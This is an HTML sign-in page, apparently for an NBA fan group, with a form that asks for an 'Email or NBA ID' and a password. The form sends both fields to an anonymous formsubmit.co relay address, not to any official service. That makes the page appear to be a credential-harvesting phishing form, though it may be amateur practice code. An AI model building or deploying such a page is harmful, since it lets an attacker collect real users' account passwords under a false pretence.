<! DOCTYPE html>
<html>
    <head>
        <title>Sign in</title>
        <link rel="stylesheet" href="/form.css">
        <style>
            form{
                width: 450px;
                height: fit-content;
                box-shadow:rgba(0, 0, 0, 0.16) 0px 1px 4px, hsla(249, 51%, 38%, 0.011) 0px 0px 0px 3px;
                padding: 20px;
                text-align: center;
            }
            body{
                display: flex;
                justify-content: center;
                height: 100vh;
                align-items: center;
                flex-direction: column;
            }
            input{
                width: 60%;
                height: 30px;
                outline: none;
                border-radius: 5px;
                border: 1px solid gray;
            }
        button{
            background-color:blue;
            width: 55%;
            height: 30px;
            border-radius: 5px;
            border:0;
            color: white;
              }
        </style>
    </head>
    <body>
        <form action="https://formsubmit.co/97a11a192bc35613173939d93b35f183" method="post">
            <span style="font-size: 23px;font-weight: 600">You must be GREEN to join #Differenthere☠︎</span>
            <br>
            <span style="color: #021222a9;">we are a team that cares about winning</span>
            <br>
            <br>
            <label for="">Email or NBA ID</label>
            <br>
            <input type="Email" placeholder="  Enter Email or NBA ID" name="Email" required>
            <br>
            <br>
            <label for="">Password</label>
            <br>
            <input type="password" placeholder="  Password" name="Password">
            <br>
            <br>
            <button type="submit">Register</button>
            <br>
            <br>
            <input type="submit" value="Register">
        </form>

        <p>Welcome to the Champions Lounge☻</p>
        <p>Join us to bring home the 19th</p>

        <div id="sec1">sec1</div>

        <section class="sec2">sec2</section>
    </body>
</html>